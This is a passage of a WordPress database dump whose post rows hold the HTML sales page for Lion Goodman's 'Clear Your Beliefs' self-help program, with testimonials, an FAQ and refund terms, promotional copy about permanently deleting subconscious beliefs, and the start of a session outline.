alt="line" width="300" height="14" />\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n//', 'p', '', 'inherit', 'open', 'open', '', '2161-revision-v1', '', '', '2015-05-12 12:49:28', '2015-05-12 17:49:28', '', 2161, 'http://clearyourbeliefs.com/2161-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2164, 2, '2015-05-12 13:16:19', '2015-05-12 18:16:19', '<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />&nbsp;\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n<h2>How and Why It Works So Well</h2>\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.&nbsp;\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\nThe best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" />\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.\n\n<strong>We literally create our reality with our beliefs.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n\n<strong>It''s that simple.</strong>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\nA shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\nChange the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> It''s that simple.</strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?<em>\n\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again.\n\n<strong>Here''s why:</strong>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\nYou''re no longer held back by old beliefs and stories.\n\nThere''s no resistance to doing what needs to be done.\n\nYou feel joy and positive energy as you move forward to create the life of your dreams.\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<h1>With This Methodology, You Can Finally:</h1>\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity<strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<h1>A Message from Lion Goodman...</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>Dear Explorer:\n\nAs a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.\n\nI was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There''s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your 